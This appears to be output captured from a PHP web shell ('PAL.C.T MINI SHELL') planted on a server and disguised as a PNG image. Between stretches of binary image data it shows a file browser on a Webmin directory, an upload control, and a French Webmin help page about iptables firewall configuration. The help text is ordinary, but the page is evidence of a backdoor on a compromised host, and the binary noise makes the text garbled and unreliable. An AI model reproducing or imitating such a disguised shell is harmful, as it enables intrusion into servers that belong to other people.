php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall/help/
upload
files >> //usr/libexec/webmin/firewall/help/intro.fr.auto.html

<header> Pare-feu Linux </header><h3> Introduction du module </h3> Ce module vous permet de configurer les fonctionnalités de pare-feu IPtables présentes dans la série 2.4 de noyaux Linux. Contrairement à d&#39;autres programmes de configuration de pare-feu, au lieu de créer un script shell qui configure le pare-feu, il lit et modifie un fichier de sauvegarde au format lu et écrit par <tt>ipi (6) tables-restore</tt> et <tt>ipi (6) tables-save</tt> respectivement. <p> Si vous avez déjà un pare-feu sur votre système qui a été installé manuellement ou à partir d&#39;un fichier de script, le module vous proposera de le convertir en un fichier de sauvegarde IPtables et de créer un script à exécuter au démarrage pour activer les règles dans le fichier. Cependant, si vous faites cela, vous ne devez plus modifier votre script de règles de pare-feu et vous devez également désactiver son exécution au démarrage. <p><h3> Présentation d&#39;IPtables </h3> Chaque paquet réseau entrant, sortant ou transmis par votre système est vérifié par rapport à une ou plusieurs chaînes pour déterminer ce qui va lui arriver. Chaque chaîne contient zéro ou plusieurs règles, chacune ayant une condition (pour déterminer les paquets auxquels elle correspond) et une action (pour contrôler ce qui arrive à ces paquets correspondants). Chaque chaîne a également une action par défaut qui contrôle ce qui arrive aux paquets qui ne correspondent à aucune règle. <p> Chaque chaîne fait partie d&#39;un tableau, dont il existe actuellement trois: <ul><li> <b>Filtrage de paquets ( <tt>filtre</tt> )</b> <br> Les chaînes de ce tableau peuvent être utilisées pour contrôler les données entrant dans votre système à partir d&#39;autres hôtes du réseau, les données envoyées depuis votre système par les utilisateurs et les processus, et les données transmises par votre système s&#39;il agit en tant que routeur. <p><li> <b>Traduction d&#39;adresses réseau ( <tt>nat</tt> )</b> <br> Ce tableau peut être utilisé pour configurer le NAT ou le masquage, ce qui est utile si vous souhaitez donner à un réseau entier de machines un accès à Internet via une seule adresse IP réelle. <p><li> <b>Altération de paquets ( <tt>mangle</tt> )</b> <br> Ce tableau sert à modifier les paquets transmis ou envoyés par votre système. <p></ul> En plus des chaînes standard qui font partie de chaque table, vous pouvez également créer vos propres chaînes qui peuvent être exécutées par des règles dans les chaînes intégrées. Cela peut être utile pour regrouper et partager des règles qui peuvent être utilisées à plusieurs endroits. <p><h3> La page principale </h3> La page principale de ce module répertorie toutes les chaînes et règles d&#39;une des tables disponibles, sélectionnées dans la liste en haut à gauche. Vous trouverez ci-dessous une section pour chaque chaîne du tableau actuel, avec toutes les règles de chaque chaîne répertoriées et leurs conditions décrites au mieux des capacités du module. Pour chaque chaîne, vous pouvez modifier l&#39;action par défaut à l&#39;aide de la liste déroulante si la chaîne fait partie de celles intégrées pour la table, ou la supprimer avec le bouton Supprimer la chaîne si elle est définie par l&#39;utilisateur. <p> Vous pouvez cliquer sur n&#39;importe quelle règle d&#39;une chaîne pour la modifier, cliquer sur les flèches à droite de chaque ligne pour la déplacer vers le haut ou vers le bas, ou cliquer sur le bouton Ajouter une règle pour en ajouter une nouvelle. L&#39;ajout ou la modification d&#39;une règle vous amène à une page sur laquelle vous pouvez sélectionner l&#39;action pour chaque règle et les conditions pour lesquelles l&#39;action est exécutée. <p> Au bas de la page se trouve un bouton pour rendre la configuration actuelle du pare-feu active, en la chargeant dans le noyau avec la commande <tt>ipi (6) tables-restore</tt> . En dessous, il y a un bouton pour faire l&#39;inverse - prendre la configuration qui est actuellement dans le noyau et la rendre disponible pour l&#39;édition. Enfin, si votre distribution le prend en charge, il y a un bouton pour changer si le pare-feu est activé au démarrage ou non. <p><h3> Chaînes filtrantes </h3> Pour une meilleure collaboration avec les scripts iptables externes, vous pouvez exclure des chaînes individuelles du traitement par le pare-feu. Pour ce faire, vous devez sélectionner le traitement direct des règles dans les paramètres et entrer une liste de filtres, qui exclut les chaînes appropriées du traitement. Les chaînes qui ne sont pas exclues de l&#39;édition sont signalées par un message &quot;non géré par le pare-feu&quot;. <p><h3> Ensembles IP </h3> Les versions plus récentes de la table ip (6) prennent en charge l&#39;extension ipset. Les ensembles IP sont des listes d&#39;adresses IP dans la mémoire principale, qui peuvent être recherchées très efficacement et utilisées comme condition dans les règles. Sur la page principale, les ensembles IP existants qui peuvent être utilisés par des règles sont affichés. Actuellement, cependant, il n&#39;est pas possible de les gérer dans le pare-feu. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`